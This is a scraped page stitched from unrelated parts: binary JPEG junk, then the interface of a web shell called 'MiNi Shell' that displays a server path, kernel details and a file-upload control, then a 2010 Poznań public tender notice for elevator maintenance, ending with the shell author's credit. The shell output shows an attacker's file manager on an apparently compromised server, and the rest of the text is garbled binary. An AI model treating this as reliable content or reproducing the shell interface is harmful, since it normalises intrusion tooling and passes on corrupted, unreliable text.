JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100107/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100107/4515-N-2010.html

<p class="kh_header"><b>Poznań: Usługi konserwacji dźwigów</b><br>
<b>Numer ogłoszenia: 4515 - 2010; data zamieszczenia: 07.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Poznań - Zarząd Komunalnych Zasobów Lokalowych w im. i na rzecz którego działa Miejskie Przedsiębiorstwo Gospodarki Mieszkaniowej S.A. , ul. Rybaki 18a, 61-884 Poznań, woj. wielkopolskie, tel. (061) 657 90 00, faks (061) 657 90 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpgm.poznan.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi konserwacji dźwigów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1.	Przedmiotem niniejszego zamówienia jest usługa konserwacji dźwigów osobowych oraz platform schodowych zgodnie z wytycznymi producenta, dokumentacją techniczno-ruchową oraz przepisami Urzędu Dozoru Technicznego (UDT), a także Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 29 października 2003 r. w sprawie warunków technicznych dozoru technicznego w zakresie eksploatacji niektórych urządzeń transportu bliskiego (Dz. U. Nr 193, poz. 1890).
1.2.	W ramach usługi konserwacji dźwigów osobowych, zgodnie z treścią załącznika Nr 2 do Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 29 października 2003 r. w sprawie warunków technicznych dozoru technicznego w zakresie eksploatacji niektórych urządzeń transportu bliskiego, należy dokonać przeglądów nie rzadziej niż co 30 dni. W ramach prowadzonego przeglądu należy przede wszystkim:
1.2.1. Sprawdzić działanie wyłącznika dźwigu przez dwukrotne wyłączenie i załączenie. Wywiesić tabliczkę ostrzegawczą na parterze.
1.2.2. Dojść (dojechać) do maszynowni sprawdzić zamknięcie drzwi, otworzyć maszynownie sprawdzić działanie wyłącznika głównego i oświetlenia maszynowni i szybu.
1.2.3. Wyłączyć dźwig, wykonać dwie jazdy próbne przez całą długość szybu, sprawdzić drgania zespołu napędowego, sprawdzić działanie kontaktów krańcowych, sprawdzić sprężenie cierne w czasie jazdy w górę.
1.2.4. Pomierzyć napięcie w układzie sterowania i zasilania w czasie rozruchu silnika.
1.2.5. Sprawdzić działanie kontaktu ogranicznika prędkości rozwierając go ręcznie.
1.2.6. Sprawdzić poziom oleju w przekładni, łożyskach silnika i styczniku olejowym, wkręcić smarownice ogranicznika prędkości, koła linowego, łożyska oporowego przekładni, sprawdzić położenie pierścienia smarującego w łożyskach silnika.
1.2.7. Wyregulować hamulec wciągarki.
1.2.8. Sprawdzić luz gumowy tulei sprzęgła, dokręcić nakrętki sworzni sprzęgła i koła ciernego.
1.2.9. Sprawdzić współosiowość ślimaka i wału silnika.
1.2.10. Sprawdzić stan koła ciernego zdawczego.
1.2.11. Sprawdzić stan lin nośnych i linki ogranicznika prędkości.
1.2.12. Sprawdzić pełen cykl pracy drzwi automatycznych na jednym przystanku obserwując pracę aparatury sterowej.
1.2.13. Sprawdzić zbiorczość wezwań i dyspozycji oraz działanie układu wyłączenia zbiorczości wezwań.
1.2.14. Wysłać kabinę na najwyższy przystanek, włączyć jazdę rewizyjna, oświetlenie szybu i zamknąć maszynownię.
1.2.15. Zejść na najwyższy przystanek. Sprawdzić stan zawieszenia linowego kabiny, mocowanie linki ogranicznika prędkości oraz mocowanie kabla zwisowego.
1.2.16. Na każdym przystanku sprawdzić działanie zamków, rygli i kontaktów drzwi, przełączników piętrowych impulsów i wyłączników zatrzymania.
1.2.17. Sprawdzić stan elementów nośnych przeciwwagi, zamocowanie kabla zwisowego w szybie działanie kontaktu zwisu lin i chwytaczy.
1.2.18. Sprawdzić wydłużenie linki ogranicznika prędkości, usuwanie kontaktu obciążki i mocowanie drabinki do podszybia, dokręcić smarownicę obciążki, dokonać oględzin chwytaczy.
1.2.19. Sprawdzić działanie drzwi kabinowych, progu ruchomego, alarmu.
1.2.20. Włączyć dźwig do normalnej pracy (dla ster. grupowego pozostałe dźwigi wyłączyć) zamknąć maszynownię.
1.2.21. Dysponując na każdy przystanek sprawdzić rejestrację dyspozycji i dokładność zatrzymania kabiny na przystankach jadących w dół.
1.2.22. Sprawdzić realizację i kasowanie wezwań.
1.2.23. Sprawdzić działanie ruchomej podłogi w kabinie.
1.2.24. Wejść do maszynowni, posprzątać maszynownię, wpisać przeglądy do dziennika, włączyć oświetlenie szybu i maszynowni. Po zjechaniu w dół zdjąć tabliczkę ostrzegawczą.
1.2.25. Obsługa kompleksowa badania według przepisów UDT.
1.3.	Ponadto, w ramach usługi konserwacji dźwigów osobowych, należy dokonać przeglądów rocznych, przygotowujących dźwig do badań okresowych przeprowadzanych przez UDT. Zakres czynności takich przeglądów odpowiada czynnościom wskazanym w punkcie 1.2., a także obejmuje m.in. następujące czynności:
1.3.1. Uzupełnienie poziomu oleju w przekładni i w łożyskach silnika.
1.3.2. Czyszczenie styków głównych i pomocniczych styczników.
1.3.3. Sprawdzenie klocków hamulcowych, oczyszczenie wnętrz luzownika, smarowanie przegubu dźwigni, sprawdzenie luzu międzyzębnego i poosiowego ślimaka, sprawdzenie sprężenia ciernego.
1.3.4. Rozebranie, czyszczenie i smarowanie ograniczników prędkości, skontrolowanie luzy sworzni ciężarków i łożyska ślizgowego kółka linowego z wyjątkiem ograniczników K1401 i K1402.
1.3.5. Nasmarowanie zewnętrznej przekładni i skontrolowanie stanu zębów przekładni.
1.3.6. Sprawdzenie działania licznika wezwań i układu wysłania rezerwy.
1.3.7. Sprawdzenie działania zabezpieczenia termicznego silnika i przekaźnika termistorowego silnika i przekaźnika termistorowego.
1.3.8. Na każdym przystanku smarowanie rolki przełączników piętrowych, rygli zawiasów drzwi.
1.3.9. Czyszczenie, smarowanie prowadnic, w połowie szybu sprawdzenie i wyregulowanie prowadników przeciwwagi.
1.3.10. Oczyszczenie, nasmarowanie krzywki ruchomej, wyłącznika zatrzymania, sterownika drzwi automatycznych, silnika napędu drzwi, oczyszczenie kontaktów drzwi i górnej belki drzwi automatycznych, kontaktów chwytaczy.
1.3.11. Sprawdzenie i wyregulowanie prowadników lub wkładek prowadników kabiny, smarowanie obciążni, czyszczenie i smarowanie chwytaczy, sprawdzenie działania wyłącznika sterowania w podszybiu.
1.3.12. Oczyszczenie podszybia i sprawdzenie mocowania pudła kabiny w ramie.
1.3.13.	Dokręcenie nakrętki mocowania prowadnic od dołu do góry.
1.3.14. Dysponując na każdy przystanek jadący do góry sprawdzenie działania kaset wezwań i urządzeń sygnalizacyjnych , wyświetlaczy, gongów, itp.
1.4. Wykaz usterek do usuwania w ramach konserwacji dźwigów osobowych:
a) Usunięcie przyczyny niedokładnego zatrzymania na przystankach polegająca na regulacji hamulca, przysunięciu krzywek, przesłonek, regulacja wyłącznika zatrzymania lub przełącznika piętrowego.
b) Wymiana wkładek topikowych bezpieczników uszkodzonych z innych powodów niż trwałe zwarcie, oczyszczenie i regulacja kontaktów.
c) Usunięcie zjawiska zbyt szybkiego lub zbyt wolnego zamykania drzwi przystankowych półautomatycznych poprzez regulacje amortyzatora, uzupełnienie oleju w amortyzatorze lub regulację naciągu sprężyny, a przy drzwiach automatycznych poprzez regulację strumienia świetlnego żarówki fotokomórki lub regulację kontaktu listwy bezpieczeństwa.
d) Usunięcie przyczyny zacinania i niemożliwości otwarcia i dokładnego zamknięcia drzwi szybowych poprzez regulację rygla lub krzywki ruchomej. Usunięcie ocierania skrzydła drzwi półautomatycznych o posadzkę lub listwę progową poprzez regulację wysokości zawieszenia drzwi.
e) Usunięcie niesprawności kaset, dyspozycji lub przywołania poprzez regulację styku.
f) Usunięcie przyczyny zadziałania urządzenia chwytowego poprzez regulacje ogranicznika prędkości, regulację długości cięgien pionowych klinów, usunięciu zadziorów mechanicznych prowadnic.
g) Regulacja głośności dzwonka alarmowego oraz umocowanie obluzowanych szyb w drzwiach szybowych i kabinowych.
1.5. Zestawienie czynności objętych usługą konserwacji platform schodowych:
I. Utrzymanie platformy w stałym ruchu z wyjątkiem postojów niezbędnych do wykonania czynności konserwacyjnych i naprawczych.
II. Wykonawca zobowiązany jest przeprowadzić nie rzadziej niż co 30 dni kontrole (zgodnie z obowiązującymi przepisami UDT) polegającą na:
a) sprawdzeniu przełącznika kluczowego,
b) sprawdzeniu przycisku alarm,
c) sprawdzeniu przycisku zatrzymania alarmowego STOP,
d) oględzinach reduktora z silnikiem, aparatury sterowej i stycznikowej,
e) sprawdzeniu stanu elementów toru jezdnego,
f) sprawdzeniu działania kontaktów bezpieczeństwa, ogranicznika prędkości, wyłączników krańcowych,
g) czyszczeniu i smarowanie elementów platformy (toru jezdnego, elementów ruchowych urządzenia według instrukcji smarowania),
h) dokonaniu regulacji układu napędowego, kontaktów bezpieczeństwa, elementów wchodzących w skład aparatury sterowej.
III. Wykonawca zobowiązany jest także przeprowadzić nie rzadziej niż co 6 miesięcy kontrolę (zgodnie z obowiązującymi przepisami UDT) polegającą na:
a) sprawdzeniu urządzeń zabezpieczeń mechanicznych,
b) sprawdzeniu hydraulicznych urządzeń zabezpieczających,
c) sprawdzeniu elektrycznych urządzeń zabezpieczających.
1.6. Wykonawca zobowiązany jest ponadto:
a) wysyłać niezwłocznie konserwatora w celu usunięcia zgłoszonej usterki dźwigu,
b) wyłączyć dźwig z eksploatacji w sytuacji pogorszenia się stanu technicznego dźwigu, przy którym dalsza eksploatacja może stwarzać niebezpieczeństwo dla korzystających z dźwigu lub gdy konserwator stwierdzi, że dźwig jest niewłaściwie użytkowany,
c) prowadzić zeszyt konserwacji dźwigu,
d) przygotować dźwig do badań okresowych przeprowadzanych przez UDT i uczestniczyć w tych badaniach,
e) niezwłocznie informować Zamawiającego o wyłączeniu dźwigu z eksploatacji oraz konieczności wykonania napraw, remontów i poleceń UDT,
f) zapewnić całodobowe pogotowie dźwigowe w zakresie uwalniania ludzi uwięzionych w kabinach i zabezpieczenia urządzeń, przy czym Wykonawca zobowiązany jest do uwolnienia osób zablokowanych w windzie w czasie nie przekraczającym 30 minut od momentu uzyskania informacji o zdarzeniu.
1.7. Wykaz materiałów objętych opłata za konserwację dźwigów:
a) olej i smar na uzupełnieni wymaganych stanów ( poziomów ),
b) śruby, wkręty, nakrętki, podkładki, zawleczki, nity, itp.
c) czyściwo, szmaty.
d) wkładki topikowe bezpieczników z wyłączeniem bezpieczników mocy.
e) materiały lutownicze ( cyna, kalafonia, pasta lutownicza ),
f) żarówki sygnalizacyjne w przyciskach sterowniczych przepalanych w wyniku eksploatacji.
1.8. Wykaz nieruchomości, liczby oraz typów dźwigów objętych niniejszym zamówieniem znajduje się w Specyfikacji Istotnych Warunków Zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.75.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:
1.1. posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
1.2. posiadania wiedzy i doświadczenia;
1.3.dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
1.4. sytuacji ekonomicznej i finansowej.
2.O udzielenie zamówienia mogą ubiegać się także wykonawcy, którzy nie podlegają wykluczeniu z niniejszego postępowania z przyczyn określonych w art. 24 ust. 1 i ust. 2 ustawy Pzp.
2.1. Opis sposobu dokonywania oceny spełniania warunków:
2.1.1. Zamawiający uzna spełnienie warunków udziału w postępowaniu, o których mowa w pkt 1.1. jeżeli Wykonawca posiada uprawnienia do wykonywania działalności lub czynności, które będą wykonywane przy realizacji zamówień, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2.1.2. Zamawiający uzna spełnienie warunków udziału w postępowaniu, o których mowa w pkt 1.2. i 1.4. oraz 2 jeżeli Wykonawca złoży oświadczenie zgodne z treścią załącznika nr 2 do IDW.
2.1.3. Zamawiający uzna spełnienie warunków udziału w postępowaniu, o których mowa w pkt 1.3 jeżeli Wykonawca złoży oświadczenie zgodne z treścią załącznika nr 2 do IDW, a także na podstawie dokumentów, o których mowa w pkt 10.2. SIWZ
3.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że:
3.1.Warunki opisane w pkt 1.1. oraz 2. spełniają każdy Wykonawca z osobna;
3.2.Warunki opisane w pkt 1.2., 1.3. oraz 1.4. Wykonawcy spełniają łącznie
4.Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych w pkt 11 IDW oświadczeń i dokumentów, wg. formuły spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Dla potwierdzenia spełnienia warunków udziału w postępowaniu, Wykonawcy winni przedłożyć niżej wymienione oświadczenia i dokumenty:
1.1. Wypełniony formularz oferty - załącznik nr 1 do IDW;
1.2. Oświadczenie Wykonawcy, złożone na podstawie art. 22 ust. 1 pkt. 1-4 oraz art. 24 ust. 1 i 2 ustawy Pzp - załącznik nr 2 do IDW;
1.3. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 1 miesiąc przed upływem terminu składania ofert;
1.4. Dokumenty potwierdzające uprawnienia Dozoru Technicznego w zakresie przygotowania zawodowego do pełnienia funkcji dozorowych w realizacji zamówienia.
2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
3. Dokumenty w przypadku Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości oraz nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji własnego organu Dokumenty, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokumenty, potwierdzające, ze nie zalega  z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji własnego organu powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepisy dotyczące terminów określonych w pkt. 3. IDW stosuje się odpowiednio.
5. Oświadczenia i dokumenty składane w ofercie w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:
5.1.1. Oświadczenie wymienione w pkt 1.2., winno być przedłożone przez każdego Wykonawcę z osobna;
5.1.2. Dokumenty wymienione w punktach, 1.3., (lub w pkt. 3., jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej), a także 1.4., winny być przedłożone przez każdego Wykonawcę z osobna. 
5.1.3. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni ustanowić Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego. W tym celu do oferty musi zostać dołączone stosowne pełnomocnictwo dla Pełnomocnika podpisane przez wszystkich wspólnie ubiegających się o zamówienie Wykonawców. 
5.1.4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, w przypadku wybrania ich oferty, zobowiązani będą do przedłożenia Zamawiającemu (jeszcze przed podpisaniem umowy w sprawie zamówienia publicznego), umowy regulującej współpracę tych Wykonawców w zakresie realizacji zamówienia publicznego, którego dotyczy niniejsza SIWZ.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mpgm.poznan.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedsiębiorstwo Gospodarki Mieszkaniowej Spółka Akcyjna ul. Rybaki 18a, 61-884 Poznań, pokój 231..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.01.2010 godzina 10:00, miejsce: Miejskie Przedsiębiorstwo Gospodarki Mieszkaniowej Spółka Akcyjna ul. Rybaki 18a, 61-884 Poznań, pokój 231.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com